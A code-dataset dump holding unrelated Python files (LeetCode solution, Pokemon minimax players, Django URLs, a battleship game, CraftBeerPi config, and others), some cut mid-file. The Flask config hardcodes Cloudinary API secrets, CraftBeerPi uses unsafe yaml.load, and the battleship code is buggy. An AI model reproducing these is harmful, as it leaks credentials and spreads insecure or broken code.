sum_all//phan_tram\nfor name in tqdm(list_name):\n i += 1\n if i%num_get == 0:\n continue\n else:\n fp_img = os.path.join(fd_img, name)\n fp_mask = os.path.join(fd_img_mask_check, name)\n # print(fp_img)\n remove_img_nodata(fp_mask, fp_img, percent_zeros=99.9)\n","repo_name":"anhbn995/GOGOOK","sub_path":"Proccesing_all/remove_mask255_nhieu.py","file_name":"remove_mask255_nhieu.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37285413318","text":"#\n# @lc app=leetcode id=430 lang=python3\n#\n# [430] Flatten a Multilevel Doubly Linked List\n#\n# https://leetcode.com/problems/flatten-a-multilevel-doubly-linked-list/description/\n#\n# algorithms\n# Medium (48.84%)\n# Likes: 818\n# Dislikes: 127\n# Total Accepted: 59.2K\n# Total Submissions: 120.1K\n# Testcase Example: '[1,2,3,4,5,6,null,null,null,7,8,9,10,null,null,11,12]\\r'\n#\n# You are given a doubly linked list which in addition to the next and previous\n# pointers, it could have a child pointer, which may or may not point to a\n# separate doubly linked list. These child lists may have one or more children\n# of their own, and so on, to produce a multilevel data structure, as shown in\n# the example below.\n# \n# Flatten the list so that all the nodes appear in a single-level, doubly\n# linked list. You are given the head of the first level of the list.\n# \n# \n# Example 1:\n# \n# \n# Input: head = [1,2,3,4,5,6,null,null,null,7,8,9,10,null,null,11,12]\n# Output: [1,2,3,7,8,11,12,9,10,4,5,6]\n# Explanation:\n# \n# The multilevel linked list in the input is as follows:\n# \n# \n# \n# After flattening the multilevel linked list it becomes:\n# \n# \n# \n# \n# Example 2:\n# \n# \n# Input: head = [1,2,null,3]\n# Output: [1,3,2]\n# Explanation:\n# \n# The input multilevel linked list is as follows:\n# \n# ⁠ 1---2---NULL\n# ⁠ |\n# ⁠ 3---NULL\n# \n# \n# Example 3:\n# \n# \n# Input: head = []\n# Output: []\n# \n# \n# \n# \n# How multilevel linked list is represented in test case:\n# \n# We use the multilevel linked list from Example 1 above:\n# \n# \n# ⁠1---2---3---4---5---6--NULL\n# ⁠ |\n# ⁠ 7---8---9---10--NULL\n# ⁠ |\n# ⁠ 11--12--NULL\n# \n# The serialization of each level is as follows:\n# \n# \n# [1,2,3,4,5,6,null]\n# [7,8,9,10,null]\n# [11,12,null]\n# \n# \n# To serialize all levels together we will add nulls in each level to signify\n# no node connects to the upper node of the previous level. The serialization\n# becomes:\n# \n# \n# [1,2,3,4,5,6,null]\n# [null,null,7,8,9,10,null]\n# [null,11,12,null]\n# \n# \n# Merging the serialization of each level and removing trailing nulls we\n# obtain:\n# \n# \n# [1,2,3,4,5,6,null,null,null,7,8,9,10,null,null,11,12]\n# \n# \n# Constraints:\n# \n# \n# Number of Nodes will not exceed 1000.\n# 1 <= Node.val <= 10^5\n# \n# \n#\n\n# @lc code=start\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val, prev, next, child):\n self.val = val\n self.prev = prev\n self.next = next\n self.child = child\n\"\"\"\nclass Solution:\n def flatten(self, head: 'Node') -> 'Node':\n # DFS by Recursion\n # Time complexity: O(N)\n # Space complexity: O(N)\n # def flatten_dfs(prev, curr):\n # if not curr:\n # return prev\n\n # curr.prev = prev\n # prev.next = curr\n\n # # the curr.next would be tempered in the recursive function\n # tempNext = curr.next\n # tail = flatten_dfs(curr, curr.child)\n # curr.child = None\n # return flatten_dfs(tail, tempNext)\n\n # if not head: return head\n\n # # pseudo head to ensure the `prev` pointer is never none\n # pseudoHead = Node(None, None, head, None)\n # flatten_dfs(pseudoHead, head)\n\n # # detach the pseudo head from the real head\n # pseudoHead.next.prev = None\n # return pseudoHead.next\n\n\n # DFS by Iteration\n # Time complexity: O(N)\n # Space complexity: O(N)\n if not head:\n return\n\n pseudoHead = Node(0, None, head, None)\n prev = pseudoHead\n\n stack = [head,]\n\n while stack:\n curr = stack.pop()\n\n prev.next = curr\n curr.prev = prev\n\n if curr.next:\n stack.append(curr.next)\n\n if curr.child:\n stack.append(curr.child)\n # don't forget to remove all child pointers.\n curr.child = None\n\n prev = curr\n\n # detach the pseudo head node from the result.\n pseudoHead.next.prev = None\n return pseudoHead.next\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"430.flatten-a-multilevel-doubly-linked-list.py","file_name":"430.flatten-a-multilevel-doubly-linked-list.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"29552946625","text":"import abc\nfrom pokemon import *\nfrom random import choice\nfrom time import time\nfrom minimax import *\nimport matplotlib.pyplot as plt\n\n# Joueur #\nclass Joueur(metaclass = abc.ABCMeta):\n \"\"\"Définit un joueur\"\"\"\n def __init__(self, joueur, nom):\n self.id = joueur #identifient\n self.historique_temps = []#historique des temps de réponse \n self.nom = nom\n\n def __call__(self, jeu, etat):\n t = time()\n mvt = self.strategie(jeu, etat)#stratégie spécifique à un joueur.\n self.historique_temps.append(time() - t)#mesure du temps de réponse\n return mvt\n \n @abc.abstractclassmethod\n def strategie(self, jeu, etat):\n pass\n\n def afficher_historique(self):\n x = range(len(self.historique_temps))\n y = self.historique_temps\n plt.plot(x, y, 'r')\n plt.axline((0,0), (10**-7,0), color=\"black\", linewidth=1)\n plt.axline((0,0), (0,10**-7), color=\"black\", linewidth=1)\n plt.xlabel('numero du choix')\n plt.ylabel('temps de reflexion (en s)')\n plt.title(f'Temps de réponse de {self.nom}')\n plt.show()\n\n def __str__(self):\n return self.nom\n# end #\n\n# JoueurMiniMax #\nclass JoueurMiniMax(Joueur):\n \"\"\"Definit un joueur qui applique une stratégie utilisant le minimax.\n Voir minimax pour plus de précision sur les paramètres.\"\"\"\n def appliquer_minimax(self, jeu, etat, profondeur, fonction_valeur,\\\n traitement_alea, condition_tri):\n dresseur = etat[self.id]\n etat.interface.animation_reflexion(dresseur)\n if self.id == 'joueur1':\n mouvement = minimax_joueur1(jeu, etat, profondeur, fonction_valeur,\\\n traitement_alea, condition_tri)[0]\n else:\n mouvement = minimax_joueur2(jeu, etat, profondeur, fonction_valeur,\\\n traitement_alea, condition_tri)[0]\n etat.interface.fin_animation_reflexion()\n return mouvement\n\n# end #\n\nclass Humain(Joueur):\n\n def __init__(self, joueur):\n super().__init__(joueur, 'Humain')\n \n def strategie(self, jeu, etat):\n \"\"\"Réalise l'ensemble des requêtes necessaires pour faire choisir son action à \n l'utilisateur.\"\"\"\n dresseur = etat[self.id]\n if dresseur.doit_changer:\n poke = etat.interface.demander_pokemon(dresseur)\n if poke == 'menu':\n return self(jeu, etat)\n return ChangerPoke(poke)\n choix = etat.interface.demander_choix(dresseur)\n if choix == 'attaquer':\n attaque = etat.interface.demander_attaque(dresseur)\n if attaque == 'menu':\n return self(jeu, etat)\n return attaque\n elif choix == 'changer':\n if dresseur.pokemons_dispo == []:\n print(\"Vous ne pouvez pas changer, il ne vous reste qu'un pokemon\")\n return self(jeu, etat)\n poke = etat.interface.demander_pokemon(dresseur)\n if poke == 'menu':\n return self(jeu, etat)\n action = ChangerPoke(poke)\n return action\n else :\n raise ValueError\n\nclass JoueurAleatoire(Joueur):\n \n def __init__(self, joueur):\n super().__init__(joueur, 'Aléatoire')\n \n def strategie(self, jeu, etat):\n dresseur = etat[self.id]\n #choix aléatoire parmit les action possible du joueur.\n return choice(jeu.mouvements_autorises_dresseur(etat, dresseur))\n\n# avantage_type #\ndef avantage_type(avantage : Pokemon, desavantage : Pokemon):\n \"\"\" Vrai si le pokemon avantage à un avantage de type sur \n le pokemon desavantage \n Remarque : deux pokemon peuvent se resister l'un à\n l'autre à l'autre en même temps et il n'y a alors pas\n d'avantage.\"\"\"\n return (desavantage.type.nom in avantage.type.resistance and not\\\n avantage.type.nom in desavantage.type.resistance) or \\\n (desavantage.type.nom in avantage.type.imunite) or \\\n avantage.type.nom in desavantage.type.faiblesse\n# end #\n\n# basique #\n\nclass JoueurBasique(Joueur):\n \"\"\"Joueur qui suit un ensemble de règles prédéfinies.\"\"\"\n def __init__(self, joueur):\n super().__init__(joueur, 'Basique')\n\n def changer(self, dresseur, adversaire, attaque_possible = True):\n \"\"\" Selection de l'agent si l'agent decide de changer de\n pokemon en priorite\n Precondition : dresseur peut changer de pokemon c'est à dire\n dresseur.pokemons_dispo != []\"\"\"\n # choix en priorite d'un pokemon qui a un avantage de type\n liste_changement = [poke for poke in dresseur.pokemons_dispo \\\n if avantage_type(poke, adversaire.courant)]\n if liste_changement != []:\n return ChangerPoke(choice(liste_changement))\n else:\n # Sinon un pokemon qui n'a pas de desavantage de type\n liste_changement = [poke for poke in dresseur.pokemons_dispo \\\n if not avantage_type(adversaire.courant, poke)]\n if liste_changement != []:\n return ChangerPoke(choice(liste_changement))\n else:\n #A default de changement convenable, on attaque.\n if self.attaque_possible:\n return self.attaquer(dresseur, adversaire)\n \"\"\"si on a plus de PP ou si on doit changer malgrés\n qu'on ne peut faire que des changements desavantageux\n on fait un changement au hazard\"\"\"\n return ChangerPoke(choice(dresseur.pokemons_dispo))\n\n def attaquer(self, dresseur, adversaire):\n \"\"\" Selection de l'agent si l'agent decide d'attaquer\n en priorite\"\"\"\n attaques = [attaque for attaque in dresseur.courant.tuple_attaque \\\n if dresseur.courant.liste_pp[attaque.index] > 0]\n if attaques != []:\n #On effectue en priorite l'attaque qui fait le plus de degat parmit\n #celles qui ont des PP.\n attaques.sort(key = lambda attaque : attaque.degat, reverse = True)\n return attaques[0]\n else:\n #si il n'y a plus de PP dans toutes les attaques, l'ordre importe peu.\n return dresseur.courant.attaque_1\n\n def strategie(self, jeu, etat):\n #recuperation des rôles des joueurs.\n dresseur = etat[self.id]\n if self.id == 'joueur1':\n adversaire = etat['joueur2']\n else:\n adversaire = etat['joueur1']\n if etat.phase == 'debut partie':\n #choix de pokemon aleatoire en début de partie\n return choice(list(jeu.mouvements_autorises_dresseur(etat, dresseur)))\n #Verification du nombre de PP dans les attaques\n self.attaque_possible = not dresseur.courant.verifier_pp()\n if dresseur.doit_changer:\n self.attaque_possible = False\n return self.changer(dresseur, adversaire)\n if (not self.attaque_possible) and dresseur.pokemons_dispo != []:\n #si il n'y a plus de PP on change de pokemon si possible\n return self.changer(dresseur, adversaire)\n if \"emprisonne\" not in dresseur.statut and dresseur.pokemons_dispo != [] \\\n and avantage_type(adversaire.courant, dresseur.courant):\n #si il y a un desavantage de type, on change de pokemon\n return self.changer(dresseur, adversaire)\n return self.attaquer(dresseur, adversaire)\n\n# end #\n\n# JoueurAlphaBeta1 #\n\nclass JoueurAlphaBeta1(JoueurMiniMax):\n \"\"\"Joueur qui applique l'algorithme du minimax avec elagage alpha beta.\"\"\"\n def __init__(self, joueur):\n super().__init__(joueur, 'Minimax')\n \n def strategie(self, jeu, etat):\n mvt = super().appliquer_minimax(jeu, etat, 2, jeu.valeur, choix_aleatoire, lambda p : False)\n return mvt\n\n# end #\n\n# JoueurAlphaBeta2 #\n\nclass JoueurAlphaBeta2(JoueurMiniMax):\n \"\"\"Joueur qui applique l'algorithme du minimax avec elagage alpha beta.\"\"\"\n def __init__(self, joueur):\n super().__init__(joueur, 'Expectiminimax')\n \n def strategie(self, jeu, etat):\n mvt = super().appliquer_minimax(jeu, etat, 2, jeu.valeur, esperance, lambda p : False)\n return mvt\n\n# end #\n\n","repo_name":"MaelMontillet/Projects","sub_path":"Pokemon AI/code/joueurs.py","file_name":"joueurs.py","file_ext":"py","file_size_in_byte":7635,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34649428524","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'polls'\n\n# urlpatterns = [\n# path('', views.index, name='index'),\n# path('/', views.detail, name='detail'),\n# path('/results/', views.results, name='results'),\n# path('/vote/', views.vote, name='vote'),\n#\n# ]\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('/', views.DetailView.as_view(), name='detail'),\n path('/results/', views.ResultsView.as_view(), name='results'),\n path('/vote/', views.vote, name='vote'),\n]\n\n\n\n# http://127.0.0.0:8000/polls/34/\n# url匹配捕获\n\n# router : '' 不会匹配 GET 和 POST 参数或域名。 http://www.liujiangblog.com/polls/?page=3 GET POST\n# view: views.index HttpRequest对象","repo_name":"HWH88340/Django-Learning","sub_path":"mysite2/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20692465737","text":"class BaseConfig(object):\n ADMINS = []\n DEBUG = True\n TESTING = False\n VERBOSE = False\n PROPAGATE_EXCEPTIONS = True\n\n SENTRY_DSN = \"\"\n SENTRY_RELEASE = \"v0.1-rc1\"\n APP_SECRET = \"bloodheroes\"\n EXPIRED_DAYS = 360\n\n ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif', 'JPG', 'PNG', 'JPEG'])\n CLOUDINARY_URL = \"cloudinary://488657822359976:AGCI0cD84C2MU325r61V_VWhbHE@bloodheroes-dev\"\n CLOUD_API_KEY = \"\"\n CLOUD_API_SECRET = \"\"\n CLOUD_API_NAME = \"\"\n\n\nclass DevelopmentConfig(BaseConfig):\n CLOUD_API_KEY = 488657822359976\n CLOUD_API_SECRET = \"AGCI0cD84C2MU325r61V_VWhbHE\"\n CLOUD_API_NAME = \"bloodheroes-dev\"\n\n\nclass TestingConfig(BaseConfig):\n APP_MODE = \"unit_test\"\n TESTING = True\n DEBUG = True\n MONGO_DBNAME = 'bloodheroes_test'\n\n\nclass StagingConfig(BaseConfig):\n CLOUD_API_KEY = 488657822359976\n CLOUD_API_SECRET = \"AGCI0cD84C2MU325r61V_VWhbHE\"\n CLOUD_API_NAME = \"bloodheroes-dev\"\n\n\nclass ProductionConfig(BaseConfig):\n pass\n\n\nconfig = {\n \"development\": \"bloodheroes.config.DevelopmentConfig\",\n \"testing\": \"bloodheroes.config.TestingConfig\",\n \"staging\": \"bloodheroes.config.StagingConfig\",\n \"production\": \"bloodheroes.config.ProductionConfig\"\n}\n","repo_name":"maulanasly/bloodheroes","sub_path":"bloodheroes/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34057889625","text":"import os\nimport warnings\n\nfrom dwave.cloud.config import load_config\nfrom dwave.cloud.exceptions import CanceledFutureError, ConfigFileError\n\n\n# try to load client config needed for live tests on SAPI web service\ntry:\n # by default, use `test` profile from `tests/dwave.conf`,\n # with secrets (token) read from env\n default_config_path = os.path.join(os.path.dirname(__file__), 'dwave.conf')\n default_config_profile = 'test'\n\n # allow manual override of config file and profile used for tests\n test_config_path = os.getenv('DWAVE_CONFIG_FILE', default_config_path)\n test_config_profile = os.getenv('DWAVE_PROFILE', default_config_profile)\n\n config = load_config(config_file=test_config_path,\n profile=test_config_profile)\n\n # ensure config is complete\n for var in 'endpoint token solver'.split():\n if not config[var]:\n raise ValueError(\"Config incomplete, missing: {!r}\".format(var))\n\nexcept (ConfigFileError, ValueError) as e:\n config = None\n warnings.warn(\"Skipping live tests due to: {!s}\".format(e))\n","repo_name":"Elmistrana/dwave-cloud-client","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"9849105414","text":"#!/usr/bin/env python3\n# Justin Clark, Kaden Roof\n# 2021/11/11\n\n# battleship.py\n\nimport random\n\n''' The BattleShip Game! '''\n\nDEBUG = False\n\nEMPTY = \" \"\n\nhuman_ship_count = 0\ncomputer_ship_count = 0\n\nTRC = '\\u2510' # Top right corner\nTLC = '\\u250c' # Top left corner\nBRC = '\\u2518' # Bottom right corner\nBLC = '\\u2514' # Bottom left corner\nTHRZ = '\\u252c' # Top horizontal bar\nBHRZ = '\\u2534' # Bottom horizontal bar\nHRZ = '\\u2500' # Horizontal bar\nVRT = '\\u2502' # Vertical bar\nLVRT = '\\u251c' #Left vertical bar\nRVRT = '\\u2524' # Right Vertical bar\nMVRT = '\\u253c' # Middle vertical bar\n\nTROW = f\" {TLC}{(HRZ+THRZ)*9}{HRZ}{TRC}\"\nMROW = f\" {LVRT}{(HRZ+MVRT)*9}{HRZ}{RVRT}\"\nBROW = f\" {BLC}{(HRZ+BHRZ)*9}{HRZ}{BRC}\"\n\nHIT = \"H\"\nMISS = \"M\"\n\nships = { \"destroyer\" : \"D\", \"cruiser\" : \"C\", \"sub\" : \"S\", \"battleship\" : \"B\", \"carrier\" : \"A\" }\n\nplayer_positions = {}\ncomputer_positions = {}\n\ndef setup_blank_board():\n ''' Make new Board dictionary from a-t and 0-9'''\n board = {}\n for letter in \"abcdefghijklmnopqrst\":\n for column in \"0123456789\":\n board[letter+column] = EMPTY\n\n return board\n\ndef display_instructions():\n ''' Displays the instructions to the screen '''\n print(\"\"\"\n === Off Brand Battleship ===\n Instructions!:\n\n 1. place your pieces on the board\n 2. tell the computer whether or not you feel the need to go first or not...\n 3. depending on who goes first, a player will attack on the opposite player's board and a \"X\" for hit will appear or an \"M\" for miss will appear on both boards\n 4. once every one of a player's ships have been destroyed, the game will end and the player with ships still standing will be the victor\n\n \"\"\")\n\n input(\"Press any button to start...\\n\")\n\ndef display_board(b):\n '''display the fleet and attack boards'''\n print(\" FLEET \\t\\t ATTACK\")\n print()\n print(\" 0 1 2 3 4 5 6 7 8 9 \\t\\t 0 1 2 3 4 5 6 7 8 9 \")\n print(f\"{TROW}\\t\\t{TROW}\")\n for r in ['ak','bl','cm','dn','eo','fp','gq','hr','is','jt']:\n # Display the fleet and attack rows side by side\n r0, r1 =r[0], r[1]\n print(f\" {r0}{VRT}\", end='')\n # Fleet Row\n for c in \"0123456789\":\n print(f\"{b[r0+c]}{VRT}\", end='')\n\n # Attack Row\n print(f\"\\t\\t{r1} {VRT}\", end='')\n for c in \"0123456789\":\n print(f\"{b[r1+c]}{VRT}\", end='')\n\n print()\n if r != 'jt':\n print(f\"{MROW}\\t\\t{MROW}\")\n\n else: # print bottom of grid\n print(f\"{BROW}\\t\\t{BROW}\")\n\ndef human_board_setup(board):\n ''' make a new board with player inputs and return it '''\n player_board = dict(board)\n\n print(\" === Planning Phase! ===\\n\")\n\n for ship in ships:\n print(\"Multiple inputs are accepted and are neccesary for every ship!\")\n positions = input(f\"Enter your positions for the {ships[ship]} (letter, number): \")\n \n positions = positions.replace(\" \", \"\")\n positions = positions.split(\",\")\n\n if DEBUG:\n print(positions)\n\n for position in positions:\n print(position)\n player_board[position] = ships[ship]\n\n\n global human_ship_count\n human_ship_count += 1\n\n return player_board\n\ndef computer_board_setup(board):\n ''' Setup arbitrary positions for the computer '''\n #computer_board = dict(board)\n\n global computer_ship_count\n\n if not DEBUG:\n # Carrier\n for i in range(5):\n computer_board[\"a\"+str(i)] = \"A\"\n computer_ship_count += 1\n \n # Battleship\n for i in range(4):\n computer_board[\"b\"+str(i)] = \"B\"\n computer_ship_count += 1\n\n # Submarine\n for i in range(3):\n computer_board[\"c\"+str(i)] = \"S\"\n computer_ship_count += 1\n\n # Cruiser\n for i in range(3):\n computer_board[\"d\"+str(i)] = \"C\"\n computer_ship_count += 1\n\n # Destroyer\n for i in range(3):\n computer_board[\"e\"+str(i)] = \"D\"\n computer_ship_count += 1\n else:\n computer_board[\"a0\"] = \"A\"\n computer_ship_count += 1\n \n computer_board[\"a1\"] = \"A\"\n computer_ship_count += 1\n\n return computer_board\n\ndef yes_or_no():\n ''' Ask the user for yes or no and return it '''\n first = False\n\n answer = input(\"Would you like to go first? (y/n): \")\n\n if answer.lower() == \"y\":\n first = True\n elif answer.lower() == \"n\":\n first = False\n\n return first\n\ndef attack(person):\n ''' attacks the opposing board '''\n\n global human_ship_count\n global computer_ship_count\n\n if person != \"computer\":\n coordinates = input(\"Where do you want to attack?: \")\n else:\n comp_cords = \"klmnopqrst\"\n coordinates = comp_cords[random.randint(0, len(comp_cords) - 1)] + str(random.randint(0, 9))\n\n actual_coordinates = actual_coords(coordinates)\n\n if person == \"human\":\n if computer_board[actual_coordinates] != EMPTY:\n print(f\"Hit! at position {coordinates}\\n\")\n human_board[coordinates] = \"X\"\n computer_board[actual_coordinates] = \"X\"\n computer_ship_count -= 1\n\n elif computer_board[actual_coordinates] == EMPTY:\n print(f\"Miss! at position {coordinates}\\n\")\n human_board[coordinates] = \"M\"\n\n elif person == \"computer\":\n if human_board[actual_coordinates] != EMPTY:\n print(f\"Hit! at position {coordinates}\\n\")\n computer_board[coordinates] = \"X\"\n human_board[actual_coordinates] = \"X\"\n human_ship_count -= 1\n \n elif human_board[actual_coordinates] == EMPTY:\n print(f\"Miss! at position {coordinates}\\n\")\n computer_board[coordinates] = \"M\"\n\ndef actual_coords(coords):\n ''' Convert the coordinates to the enemy coordinates or vice versa '''\n alpha = \"abcdefghijklmnopqrst\"\n letter = coords[0]\n actual_index = alpha.find(letter)-10\n actual_coordinates = alpha[actual_index] + coords[1]\n\n return actual_coordinates\n\ndisplay_instructions()\n\n# Setup\nhuman_board = setup_blank_board()\nhuman_board = human_board_setup( human_board )\n\ncomputer_board = setup_blank_board()\ncomputer_board = computer_board_setup( computer_board )\n\n#print(\"Human Board\")\n#display_board( human_board )\n\nif DEBUG:\n print(\"Computer Board\")\n display_board( computer_board )\n\nfirst = \"human\"\n\nif yes_or_no():\n print(\"Human is going first\")\n print(\"Hahahaha, it looks like you need it!\")\n\n first = \"human\"\nelse:\n print(\"Computer is going first\")\n print(\"Don't get too cocky -_-, it will be your undoing\\n\")\n\n first = \"computer\"\n\ndone = False\n\n# Gameplay\nwhile not done:\n\n done = False\n\n if human_ship_count == 0:\n print(\"< You Lose >\")\n\n print(\"Here was the computer's board!\")\n display_board(computer_board)\n\n done = True\n break\n\n if computer_ship_count == 0:\n print(\" < You Win >\")\n \n print(\"Here was the computer's board!\")\n display_board(human_board)\n\n done = True\n break\n\n if first == \"human\":\n\n if DEBUG:\n print(\"==== Human Board ====\")\n \n display_board(human_board)\n\n if DEBUG:\n print(computer_board)\n\n print(\"\\n === Human is going... === \\n\")\n attack(first)\n first = \"computer\"\n elif first == \"computer\":\n\n if DEBUG:\n print(\"==== Computer Board ====\")\n display_board(computer_board)\n print(\"=== Computer is going... ===\")\n attack(first)\n first = \"human\"\n\nprint(\"Game is Done!\")\n","repo_name":"JustinClark2k3/battleship","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31863419814","text":"import random\r\n# You will need to install matplotlib with pip to view coronation histograms!\r\nimport matplotlib.pyplot as plt\r\nimport magicLampBot as bot\r\n\r\n## This is a highly simplified version of Heart of Crown, where a card can only\r\n## generate gold, be worth points, or neither. The convention used here is positive\r\n## numbers represent that much gold, while negative numbers represent point cards.\r\n\r\n## We will run 1000 solitaire games, store the number of turns to coronation for\r\n## each, and then create a histogram.\r\nturnCounts = []\r\n\r\nfor iteration in range(1000):\r\n ## The standard starting deck has seven Farming Villages and three Apprentice\r\n ## Maids (represented as 0 since they are worth no gold and we have do not\r\n ## intend to use their -2 VP value.)\r\n deck = [\"Farming Village\", \"Farming Village\", \"Farming Village\",\r\n \"Farming Village\", \"Farming Village\", \"Farming Village\",\r\n \"Farming Village\", \"Apprentice Maid\", \"Apprentice Maid\",\r\n \"Apprentice Maid\"]\r\n random.shuffle(deck)\r\n hand = []\r\n discard = []\r\n domain = []\r\n points = 0\r\n turns = 0\r\n deckPoints = 0\r\n log = \"\"\r\n while points < 20:\r\n turns += 1\r\n log += \"Turn {}:\\n\".format(turns)\r\n for draw in range(5):\r\n if len(deck) == 0:\r\n deck = discard\r\n discard = []\r\n random.shuffle(deck)\r\n hand.append(deck.pop())\r\n hand.sort()\r\n log += \"Draw: {}\\n\".format(hand)\r\n field = {\r\n \"hand\": hand,\r\n \"deck\": deck,\r\n \"discard\": discard,\r\n \"domain\": domain,\r\n \"points\": points,\r\n \"deckPoints\": deckPoints\r\n }\r\n result = bot.botTurn(field)\r\n hand = result[0][\"hand\"]\r\n deck = result[0][\"deck\"]\r\n discard = result[0][\"discard\"]\r\n domain = result[0][\"domain\"]\r\n points = result[0][\"points\"]\r\n deckPoints = result[0][\"deckPoints\"]\r\n log += result[1]\r\n while len(hand) > 0:\r\n discard.append(hand.pop())\r\n if iteration == 15:\r\n print(log)\r\n turnCounts.append(turns)\r\n\r\nplt.gca().set_ylim([0, 300])\r\nplt.hist(turnCounts, [14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28])\r\nplt.show()\r\n","repo_name":"GrayEmbrace/HeartOfCrownSim","sub_path":"hoc_sim.py","file_name":"hoc_sim.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71656541605","text":"from util import *\nfrom model import *\nfrom brewapp import app, socketio, manager\nimport yaml\n\nimport json\n\ndef pre_post(data, **kw):\n\n if data[\"type\"] is \"json\":\n data[\"value\"] = json.dumps(data[\"value\"])\n\n\ndef post_post(result, **kw):\n if result[\"type\"] is \"json\":\n result[\"value\"] = json.loads(result[\"value\"])\n readConfig()\n socketio.emit('config', app.brewapp_config, namespace='/brew')\n\n\ndef post_get_many(result, **kw):\n for o in result[\"objects\"]:\n if o[\"type\"] is \"json\":\n o[\"value\"] = json.loads(o[\"value\"])\n\n result[\"objects\"] = sorted(result[\"objects\"], key=lambda k: k['name'])\n\n\ndef readConfig():\n app.brewapp_config = {}\n config = Config.query.all()\n for c in config:\n app.brewapp_config[c.name] = c.value\n\n@brewinit(-1001)\ndef initConfig():\n if (app.createdb is False):\n return\n with open(\"config/config.yaml\", 'r') as stream:\n try:\n y = yaml.load(stream)\n for k in y.keys():\n opts = y[k].get(\"options\", None)\n if opts is not None:\n opts = \",\".join(opts)\n\n db.session.add(Config(name=k, value=y[k].get(\"value\", None), type=y[k].get(\"type\", None), description=y[k].get(\"description\", None), options=opts))\n db.session.commit()\n except yaml.YAMLError as exc:\n app.logger.error(\"Load config ERROR \" + str(exc))\n\n\n@brewinit(order=-1000)\ndef init():\n manager.create_api(Config, methods=['GET', 'POST', 'DELETE', 'PUT'], results_per_page=None,\n preprocessors={\n 'POST':[pre_post],\n 'PATCH_SINGLE': [pre_post]},\n postprocessors={\n 'POST':[post_post],\n 'GET_MANY': [post_get_many],\n 'GET_SINGLE':[post_post],\n 'PATCH_SINGLE': [post_post]})\n readConfig()\n\nfrom brewapp.base.devices import *\nfrom brewapp.base.thermometer import *\n\n@app.route('/api/config/setup', methods=['GET'])\ndef config_setup():\n return json.dumps({\"setup\": app.brewapp_config.get(\"SETUP\", \"NO\")})\n\n@brewinit()\ndef initDriver():\n app.logger.info(\"INIT Driver\")\n\n hardware= {\n 'DUMMY': dummygpio.DummyGPIO(),\n 'GPIO': gpio.BrewGPIO(),\n 'GEMBIRD': gembird.GembirdUSB(),\n 'PIFACE': piface.PiFace(),\n 'WIFISOCKET': wifisocket.WifiSocket(),\n 'CHIP-GPIO': chip_gpio.BrewGPIO(),\n 'GPIOSYS': gpiosys.GPIOSys()\n }\n\n thermometer = {\n 'DUMMY': dummy_thermometer.DummyThermometer(),\n '1WIRE': w1_thermometer.OneWireThermometer(),\n '1WIRE_V2': w1_thermometer2.OneWireThermometer2(),\n 'USB': usb_thermometer.USBThermometer()\n }\n\n app.brewapp_hardware = hardware.get(app.brewapp_config.get(\"SWITCH_TYPE\", \"DUMMY\"), dummygpio.DummyGPIO())\n app.brewapp_thermometer = thermometer.get(app.brewapp_config.get(\"THERMOMETER_TYPE\", \"DUMMY\"), dummy_thermometer.DummyThermometer())\n app.logger.info(app.brewapp_hardware )\n app.logger.info(app.brewapp_thermometer )\n","repo_name":"craftbeerpi/craftbeerpi","sub_path":"brewapp/base/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":591,"dataset":"github-code","pt":"52"} +{"seq_id":"42111025928","text":"'''\nGiven an array of strings strs, group the anagrams together. You can return the answer in any order.\nAn Anagram is a word or phrase formed by rearranging the letters of a different word or phrase, typically using all the original letters exactly once.\n\nInput: strs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\nOutput: [[\"bat\"],[\"nat\",\"tan\"],[\"ate\",\"eat\",\"tea\"]]\n'''\n\n'''\n# Run through loop of each word.\n# Each and every iteration sort word and keep adding word in the hashmap against sorted key.\n# At the end of the loop return values of hashmap which would be our answer.\n\nTime Complexity: O(n * nlogn)\nSpace Complexity: O(1)\n'''\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n \n dic = {}\n for word in strs:\n \n sortedword = ''.join(sorted(word))\n \n if sortedword in dic:\n dic[sortedword].append(word)\n \n else:\n dic[sortedword] = [word]\n \n return dic.values()\n \n","repo_name":"ankitakotadiya/CoadingChallenge","sub_path":"HashMap/GroupAnagrams.py","file_name":"GroupAnagrams.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74274608165","text":"#!/home/user/.local/share/virtualenvs/CARYARDMANAGEMENTSYSTEM-cjpx4pQo/bin/python\n\nimport click\nfrom models import session, Vehicle\n\n@click.group()\ndef cli():\n pass\n\n# Existing Click commands\n\n@click.command()\n@click.option('--make', prompt='Vehicle Make', required=True, help='Make of the vehicle')\n@click.option('--model', prompt='Vehicle Model', required=True, help='Model of the vehicle')\n@click.option('--year', 